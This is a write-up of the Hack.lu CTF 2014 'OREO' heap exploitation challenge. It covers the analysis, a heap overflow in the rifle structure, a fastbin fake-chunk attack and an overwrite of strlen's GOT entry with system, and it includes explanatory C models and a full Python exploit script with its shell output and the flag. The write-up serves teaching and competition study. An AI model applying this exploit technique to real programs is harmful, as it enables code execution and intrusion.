OREO
Hack.lu CTF 2014 - Exploiting 400 points
you0708@YOKARO-MON
The Original Rifle Company has the most
finest rifles and revolvers in whole
Rodeo City! However their buildings are
pretty secure, so your only chance to get
into their offices is by hacking through
the Original Rifle Ecommerce Online
(OREO) System and steal all those pretty
weapons from the inside! Makes sense
right? Good luck!
nc wildwildweb.fluxfingers.net 1414
Welcome to the OREO Original Rifle Ecommerce Online System!
,______________________________________
|_________________,----------._ [____] -,__ __....-----=====
(_(||||||||||||)___________/ |
`----------' OREO [ ))"-, |
"" `, _,--....___ |
`/ """"
What would you like to do?
1. Add new rifle
2. Show added rifles
3. Order selected rifles
4. Leave a Message with your Order
5. Show current stats
6. Exit!
Action: 1
Rifle name: hogehoge
Rifle description: sample rifle
Action: 2
Rifle to be ordered:
===================================
Name: hogehoge
Description: sample rifle
===================================
Action:
Analysis
Surface Analysis
• file
• ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked
(uses shared libs), for GNU/Linux 2.6.26, stripped
• checksec
• CANARY : ENABLED
• FORTIFY : disabled
• NX : ENABLED
• PIE : disabled
• RELRO : disabled
Dynamic Analysis
• We can order rifles
1. Select rifles you want to order
• Need to specify rifle name & description
2. Submit an order for selected rifles
• Can leave a message
Static Analysis
• Reverse engineering using IDA
• Data structure of the rifle
• aa_rifle (Size = 0x38)
  Offset  Size  Name
  0x00    0x19  description
  0x19    0x1B  name
  0x34    4     last
Fastbins
Reference: Heap Chunk
• http://www.slideshare.net/bata_24/katagaitai-ctf-1-57598200
Understanding Rifle Management using GDB
• After adding 2 rifles ("A"/"a" and "B"/"b"), and again after ordering them, inspect size + flag, fd and bk of each chunk
• It can be found that 0x0804A288 stores the address of the last rifle
• After adding 2 rifles, the heap holds two chunks:
  Chunk 1 (Rifle 1): (prev size) | 0x00000041 (size + flag) | description | name | last = 0
  Chunk 2 (Rifle 2): (prev size) | 0x00000041 (size + flag) | description | name | last = address of Rifle 1
• After order, both chunks are freed into the fastbin and the first two words of each rifle are reused as fd and bk:
  Chunk 2: (prev size) | 0x00000041 (size + flag) | 0x00000000 (fd) | 0x00000000 (bk)
  Chunk 1: (prev size) | 0x00000041 (size + flag) | address of Chunk 2 (fd) | 0x00000000 (bk)
Vulnerability
• Add command
1. Allocate 0x38 bytes on the heap (new rifle)
2. Link it to the previous rifle (last)
3. Input the rifle's name (max 0x38 bytes)
4. Input the rifle's description (max 0x38 bytes)
5. Increment the rifle counter
Vulnerability
• Both inputs accept up to 0x38 bytes, but name holds only 0x1B bytes and description only 0x19, so you can do a buffer overflow as below
  Rifle: description | name | last
  "A" * 0x38 into name (offset 0x19) runs through last (offset 0x34) and past the end of the 0x38-byte rifle
• Or
  Rifle: description | name | last
  "A" * 0x38 into description (offset 0x00) covers name and last
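To make the layout above concrete, here is an added example, not code from the slides or from the OREO binary, that models the 0x38-byte rifle inside a 0x40-byte malloc chunk and shows what a 0x38-byte name does to the rifle's own last field and to the next chunk's size word, beside the bounded copy that prevents it. The struct and chunk layout are taken from the slides; `uint32_t last` stands in for the 32-bit pointer so the offsets stay the same on any host, and the sentinel values are constructed.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define INPUT_MAX 0x38   /* the add command reads up to 0x38 bytes per field */

/* aa_rifle as recovered in the slides: 0x38 bytes, description at 0x00,
 * name at 0x19, last at 0x34.  On the 32-bit target `last` is a pointer;
 * a uint32_t keeps the offsets identical on any host (constructed model). */
struct rifle {
    char description[0x19];
    char name[0x1B];
    uint32_t last;
};

/* One malloc chunk of size 0x40: 8-byte header + 0x38 bytes of user data. */
struct chunk {
    uint32_t prev_size;
    uint32_t size;          /* 0x41 = 0x40 | PREV_INUSE for a live rifle */
    struct rifle r;
};

/* Two adjacent chunks: the state after adding two rifles. */
struct heap {
    struct chunk c[2];
};

static void init_heap(struct heap *h) {
    memset(h, 0, sizeof *h);
    h->c[0].size = 0x41;
    h->c[1].size = 0x41;
    h->c[1].r.last = 0x08040000u;   /* constructed stand-in for "address of Rifle 1" */
}

/* Vulnerable version (models the original add command): the input may be
 * 0x38 bytes but the field holds 0x1B, so the copy runs through `last`,
 * the next chunk's prev_size and size, and into its user data. */
static void set_name_unbounded(struct heap *h, int idx, const char *in, size_t len) {
    unsigned char *dst = (unsigned char *)h
                         + (size_t)idx * sizeof(struct chunk)
                         + offsetof(struct chunk, r)
                         + offsetof(struct rifle, name);
    if (len > INPUT_MAX) len = INPUT_MAX;
    memcpy(dst, in, len);           /* up to 0x38 bytes into a 0x1B-byte field */
}

/* Hardened version: clamp to the field size and always NUL-terminate. */
static void set_name_bounded(struct heap *h, int idx, const char *in, size_t len) {
    struct rifle *r = &h->c[idx].r;
    size_t room = sizeof r->name - 1;
    if (len > room) len = room;
    memcpy(r->name, in, len);
    r->name[len] = '\0';
}

/* Feed one 0x38-byte name of 'A's through either copy and report the two
 * fields the slides show being clobbered: this rifle's `last` and the
 * next chunk's `size`. */
static void run_input(int bounded, uint32_t *last_out, uint32_t *next_size_out) {
    struct heap h;
    char in[INPUT_MAX];
    init_heap(&h);
    memset(in, 'A', sizeof in);
    if (bounded) set_name_bounded(&h, 0, in, sizeof in);
    else         set_name_unbounded(&h, 0, in, sizeof in);
    *last_out = h.c[0].r.last;
    *next_size_out = h.c[1].size;
}

uint32_t last_after_unbounded(void)      { uint32_t l, s; run_input(0, &l, &s); return l; }
uint32_t next_size_after_unbounded(void) { uint32_t l, s; run_input(0, &l, &s); return s; }
uint32_t last_after_bounded(void)        { uint32_t l, s; run_input(1, &l, &s); return l; }
uint32_t next_size_after_bounded(void)   { uint32_t l, s; run_input(1, &l, &s); return s; }

int main(void) {
    printf("sizeof(struct rifle) = 0x%zx, sizeof(struct chunk) = 0x%zx\n",
           sizeof(struct rifle), sizeof(struct chunk));
    printf("unbounded: last = 0x%08x, next chunk size = 0x%08x\n",
           (unsigned)last_after_unbounded(), (unsigned)next_size_after_unbounded());
    printf("bounded:   last = 0x%08x, next chunk size = 0x%08x\n",
           (unsigned)last_after_bounded(), (unsigned)next_size_after_bounded());
    return 0;
}
```

With the unbounded copy both `last` and the neighbouring size word read 0x41414141, which is exactly the write the later slides rely on; the bounded copy leaves `last` at 0 and the neighbour at 0x41. The fix is the field size, not the input size: the program already limits input to 0x38 bytes, but 0x38 is the size of the whole structure, not of the field being written.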
Exploitation
Memory Leakage
• Overwrite the last rifle address: add a rifle whose name is "A" * 0x1B followed by the address of the target data. The name fills its 0x1B-byte field exactly, so the next 4 bytes land in last:
  Chunk 1 (Rifle 1): (prev size) | 0x41 (size + flag) | description | name = "A" * 0x1B | last = address of target data
• You can then read the target data as a rifle's description using the show command
Fastbins Unlink Attack
• Breaking the fastbins chain: add a rifle after freeing 2 rifles. The add reallocates the head of the fastbin as Rifle 3, and its name overflows into the neighbouring chunk, which is still freed:
  Rifle 3 name = "A" * 0x1F + 0 + 0 + 0x41 + address of target memory
  Reallocated chunk (Rifle 3): (prev size) | size + flag | description | name | last = 0
  Freed chunk: (prev size) = 0 | 0x41 (size + flag) | fd = address of target memory | bk
• The target memory is used as a heap chunk after Chunk 2 is reallocated
Reference: Fastbins Unlink Attack
• http://www.slideshare.net/bata_24/katagaitai-ctf-1-57598200
To avoid the size check failure in malloc, you have to put a correct value into "size" of the fake chunk (in this case, the value must be 0x41)
Making Fake Freed Chunk
• You have to find an area whose "size" word can be set to 0x41 at the time of re-allocation:
  Chunk: (prev size) | 0x41 (size + flag) | fd | bk
• You can use 0x804A2A0 as the freed chunk, because rifle_counter (at 0x804A2A4, where the size word of that chunk would be) can be set to 0x41 by adding rifles
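The following is an added example, not code from the slides or from glibc, that models the fastbin free list and the size check malloc applies when it pops a chunk, so that the "must be 0x41" requirement of the previous two slides can be checked concretely. The constants are the 32-bit glibc ones (SIZE_SZ = 4, 8-byte alignment); the chunks, bins and size words are constructed in memory rather than taken from the target. The check compares bin indices, so 0x41 (0x40 with PREV_INUSE set, the form a genuinely freed rifle chunk has) passes, while a counter of 0x3F or 0x48 would be rejected.

```c
#include <stdint.h>
#include <stdio.h>

/* 32-bit glibc parameters (SIZE_SZ = 4, MALLOC_ALIGNMENT = 8). */
#define SIZE_BITS         7u                         /* PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA */
#define CHUNKSIZE(s)      ((s) & ~SIZE_BITS)
#define FASTBIN_INDEX(sz) ((unsigned)((sz) >> 3) - 2u) /* 32-bit: shift by 3 */
#define NFASTBINS         10

/* request2size on 32-bit: add the size word, round up to 8, minimum 16. */
uint32_t request2size(uint32_t req) {
    uint32_t s = (req + 4u + 7u) & ~7u;
    return s < 16u ? 16u : s;
}

/* A chunk as malloc sees it.  For a freed rifle, fd and bk overlay the
 * first 8 bytes of the description field. */
struct chunk {
    uint32_t prev_size;
    uint32_t size;
    struct chunk *fd;
    struct chunk *bk;
};

struct fastbins {
    struct chunk *head[NFASTBINS];
};

/* free() of a fast chunk: push on the bin's singly linked list (LIFO). */
static void toy_free(struct fastbins *fb, struct chunk *c) {
    unsigned idx = FASTBIN_INDEX(CHUNKSIZE(c->size));
    c->fd = fb->head[idx];
    fb->head[idx] = c;
}

/* malloc() fast path: pop the head, but first apply the check that makes
 * glibc abort with "malloc(): memory corruption (fast)": the popped
 * chunk's size word must map to the bin being served.  NULL models the
 * abort (or an empty bin; the slow path is not modelled). */
static struct chunk *toy_malloc(struct fastbins *fb, uint32_t req) {
    unsigned idx = FASTBIN_INDEX(request2size(req));
    struct chunk *victim = fb->head[idx];
    if (victim == NULL)
        return NULL;
    if (FASTBIN_INDEX(CHUNKSIZE(victim->size)) != idx)
        return NULL;                       /* size check failure */
    fb->head[idx] = victim->fd;
    return victim;
}

/* Rifles come back LIFO: after freeing chunk 2 then chunk 1 (the order
 * command walks the list from the last rifle), the next add reuses
 * chunk 1, the one after it chunk 2, then the bin is empty. */
int lifo_order_ok(void) {
    struct fastbins fb = {{0}};
    struct chunk c1 = {0, 0x41, 0, 0}, c2 = {0, 0x41, 0, 0};
    toy_free(&fb, &c2);
    toy_free(&fb, &c1);
    return toy_malloc(&fb, 0x38) == &c1 && toy_malloc(&fb, 0x38) == &c2
        && toy_malloc(&fb, 0x38) == NULL;
}

/* Would a chunk whose size word reads `size_field` be handed out by the
 * 0x38-byte rifle allocation once it is the head of the bin?  This is the
 * question the slides answer with "the value must be 0x41": the rifle
 * counter at 0x804A2A4 is the size word of a chunk placed at 0x804A2A0. */
int fake_chunk_accepted(uint32_t size_field) {
    struct fastbins fb = {{0}};
    struct chunk fake = {0, size_field, 0, 0};
    fb.head[FASTBIN_INDEX(request2size(0x38))] = &fake;
    return toy_malloc(&fb, 0x38) == &fake;
}

int main(void) {
    uint32_t sizes[] = {0x3F, 0x40, 0x41, 0x48};
    printf("request2size(0x38) = 0x%x (fastbin index %u)\n",
           (unsigned)request2size(0x38), FASTBIN_INDEX(request2size(0x38)));
    printf("LIFO order: %s\n", lifo_order_ok() ? "ok" : "broken");
    for (unsigned i = 0; i < 4; i++)
        printf("size word 0x%02x at bin head: %s\n", (unsigned)sizes[i],
               fake_chunk_accepted(sizes[i]) ? "accepted" : "rejected");
    return 0;
}
```

The 0x38-byte rifle request rounds to a 0x40 chunk (index 6), which is why the slides free exactly two rifle chunks and then add rifles until the counter reads 0x41: any other counter value at that moment would be caught by this check and the program would abort instead of handing out 0x804A2A0. Defensively, this is also what the check buys you: it does not validate where fd points, only that the size word of the chunk it lands on is consistent with the bin, so it catches an off-by-a-few counter but not a correctly staged one.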
Exploitation Process
1. Leak the address of libc functions
2. Calculate the address of "system"
3. Add rifles until the rifle counter is 0x3F
4. Order rifles (free fastbins)
5. Break the fastbins chain by adding a rifle
6. Allocate 0x804A2A0 as a heap chunk by adding a rifle
7. Overwrite the GOT by leaving a message
8. Get shell
Exploitation Process
2. Calc address of “system”
• See http://pastebin.com/9vq38BYH
Exploitation Process
3. Add rifles until the rifle counter is 0x3F
4. Order rifles (free fastbins)
    while rifle_count < 0x3e:
        cmd_add("A"*27+p(0), "B")
    cmd_add("A", "B")
    cmd_order()
To avoid creating many fast chunks, "last" should be 0x00000000 in every rifle of the loop (the name "A"*27 + p(0) fills the name field and zeroes last), so that order only follows the list from the final rifle and frees just two chunks.
Exploitation Process
6. Allocate 0x804A2A0 as a heap chunk by adding a rifle
• Before the allocation, the rifle counter will be 0x41
• Its description must be the address of strlen@got
  Address    Before (variable)  After (chunk field)  After (value)
  0x804A2A0  ordered_counter    prev_size            0x00000000
  0x804A2A4  rifle_counter      size + flag          0x00000041
  0x804A2A8  lpMsg              description          address of strlen@got
  0x804a2c1  msg_buf + 1        name                 "foobar"
  0x804a2dc  msg_buf + 0x1C     last                 Unknown
• strlen@got will be called by the program after adding a rifle or leaving a message
Exploitation Process
7. Overwrite strlen@got by leaving a message
• Now lpMsg points to strlen@got
• The message should be p(libc_system) + ";sh\x00"
• ";sh\x00" will be used in the next step
Exploitation Process
8. Get shell
• The overwritten strlen will be called after adding the rifle
• Its argument is the message: p(libc_system) + ";sh\x00"
• It means the program will call system("\x??\x??\x??\x??;sh")
oreo.py
# Helper functions (sock, p, u, ready_action, cmd_add, cmd_show, cmd_order,
# cmd_msg, shell) are the author's own and are not shown on the slides.
s, f = sock("wildwildweb.fluxfingers.net", 1414)
got_malloc = 0x0804A244
got_strlen = 0x0804A250
p_order_msg = 0x0804A2A8
rifle_count = 0
ready_action()
# 1. leak: "A"*27 fills the name field, the next 4 bytes become `last`
cmd_add("A"*27+p(got_malloc-0x19), "B"*25)
libc_malloc = u(cmd_show()[1][0][:4])
print("[*] got libc malloc: 0x%08x" % libc_malloc)
# 2. system = leaked malloc - offset(malloc) + offset(system) in the remote libc
libc_system = libc_malloc - 0x0007d950 + 0x00042af0
print("[*] got libc system: 0x%08x" % libc_system)
# 3./4. add rifles with last = 0 so that order frees only the final two
while rifle_count < 0x3e:
    cmd_add("A"*27+p(0), "B")
cmd_add("A", "B")
cmd_order()
# 5. reallocate the bin head and overflow into the freed neighbour:
#    last = 0, prev_size = 0, size = 0x41, fd = 0x804A2A0
cmd_add("A"*27+p(0)+p(0)+p(0x41)+p(p_order_msg-8), "B")
# pop the second freed chunk; the bin head is now 0x804A2A0
cmd_add("A", "B")
# 6. 0x804A2A0 is handed out as the rifle; its description overlays lpMsg
cmd_add("A", p(got_strlen))
# 7. the message is written to strlen@got; the next strlen call is system(msg)
cmd_msg(p(libc_system) + ";sh\x00", noread=True)
print("[*] got shell")
shell(s)
$ python oreo.py
[*] rifle count: 0x01
[*] got libc malloc: 0xf76a2950
[*] got libc system: 0xf7667af0
[*] rifle count: 0x02
[*] rifle count: 0x03
(snip.)
[*] rifle count: 0x3f
[*] ordered
[*] rifle count: 0x40
[*] rifle count: 0x41
[*] rifle count: 0x42
[*] got shell
ls
fl4g oreo
cat fl4g
flag{FASTBINS_ARE_NICE_ARENT_THEY}
Thank you!
